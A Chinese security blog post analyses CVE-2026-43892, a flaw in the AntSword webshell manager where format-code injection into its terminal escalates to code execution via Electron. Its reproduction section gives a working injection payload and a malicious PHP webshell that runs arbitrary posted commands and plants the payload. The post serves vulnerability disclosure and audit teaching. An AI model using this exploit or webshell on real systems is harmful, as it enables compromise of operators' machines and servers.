2026年蚁剑 (AntSword)最新 1-Click RCE漏洞，从格式码注入到客户端反制

原创已于 2026-05-05 20:37:12 修改 · 735 阅读

12 ·

本内容遵循CC 4.0 BY-SA版权协议

GEO检测

标签

#xss #反制 #漏洞 #蚁剑 #安全工具

话题

#IT疑难杂症诊疗室

于 2026-05-05 20:08:10 首次发布

src漏洞挖掘专栏收录该内容

8 篇文章

订阅专栏

🔰 博主简介

SRC 白帽黑客 | 网络安全实战派博主 | 6年甲方网络安全工程师 | 腾讯 SRC 三年年榜前十

深耕 Web 安全 / 移动安全 / AI 安全 / 渗透测试 / 漏洞挖掘

国内外企业 SRC + 众测有效漏洞数 1000+ | 持续系统分享 SRC 实战案例 & 技巧

个人简介

0x01 前言

2026 年 4 月 24 日，安全研究员 s2cr3t 在 AntSword Project 官方 GitHub 仓库提交了一个编号为 #370 的严重安全漏洞报告。该漏洞源于antSword.noxss()函数过滤不完整，未能覆盖jquery.terminal格式码语法字符，导致恶意服务端可通过构造特定响应内容，在虚拟终端中注入javascript协议链接，最终实现客户端1-Click 远程代码执行 (RCE)。漏洞编号：CVE-2026-43892

0x02 安全风险背景

2.1 安全风险问题来源：

该漏洞编号：

CVE-2026-43892

👉 AntSword GitHub issue：

https://github.com/AntSwordProject/antSword/issues/370

虽然 issue 本身讨论较简略，但结合公开分析可以确认：

本质：HTML 解析 → XSS → Node.js RCE 漏洞链

该漏洞影响版本：

AntSword ≤ 2.1.15

项目	详情
漏洞类型	跨站脚本 (XSS)→代码执行 (RCE)
影响版本	AntSword v2.1.15（其他满足条件版本可能受影响）
CVSS 评分	高危 (8.8)，需要用户交互但危害
核心原因	noxss () 过滤不完整 + Electron nodeIntegration:true
利用条件	1. 攻击者控制服务端响应内容 2. 用户点击终端中的恶意链接

2.2 安全风险成因

蚁剑架构基于 Electron 开发，融合前端渲染 + Node.js 底层架构，桌面端 WebShell 管理工具。

其虚拟命令终端依赖 jquery.terminal 库实现，该组件支持自定义格式标签、超链接语法。

为防止 XSS 攻击，AntSword 实现了noxss()函数对服务端返回内容进行过滤，仅允许& ' > < "五个字符通过转义处理。

核心问题在于 noxss() 过滤发生在 jquery.terminal 格式码解析之前，形成了二次渲染的安全间隙。

同时，AntSword 默认配置nodeIntegration: true，这意味着渲染进程可以直接访问 Node.js 核心 API，包括child_process模块，为 XSS 升级为 RCE 提供了基础条件。

2.3 格式码注入

jquery.terminal v1.1.1使用[[!;;;;URL]{显示文本}]语法生成可点击链接，这些字符均未被过滤。

jquery.terminal 专属语法：

[[!;;;;协议地址]{显示文本}]

语法可自定义超链接、颜色、样式，支持 javascript: 恶意协议，无任何拦截。

安全风险链路如下：

0x03 安全风险复现

漏洞poc，以触发计算器弹窗为例

通过恶意 PHP 服务端，在终端命令执行的响应内容中注入 jquery.terminal 格式码。

[[!;;;;javascript:void(require(`child_process`).exec(`calc.exe`))]{http://localhost/phpmyadmin/}]

exp如下


<?php
// 恶意WebShell，执行任意命令时返回包含恶意格式码的结果
if(isset($_POST['ant'])){
    $cmd = base64_decode($_POST['ant']);
    // 执行命令并获取结果
    $output = shell_exec($cmd);

    // 注入jquery.terminal格式码，触发1-Click RCE
    $malicious = '[[!;;;;javascript:void(require(`child_process`).exec(`calc.exe`))]{http://localhost/phpmyadmin/}]';

    // 返回拼接后的结果
    echo $output . "\n" . $malicious;
}
?>

触发流程

效果

0x04 总结

蚁剑 Issue#370 安全风险是典型的弱过滤 + 第三方组件安全风险 + 框架高危配置组合问题。在做客户端安全、Electron 安全或工具类产品的审计，可以重点盯三类点：第一，输入是否经过多层解析；第二，是否存在“先过滤、后组件化渲染”；第三，页面是否保留了高危能力，比如 nodeIntegration、不受限的协议处理、或者富文本。

温馨提示

温馨提示

更多精品教程首发于公众hao，教程若有误差，欢迎进群反馈并移步公众hao：白帽攻防录，查看最新版✨
教程配套所有资源交流群领取、学习过程中有任何问题，可加入交流Q群 1093408150共同讨论、互相学习；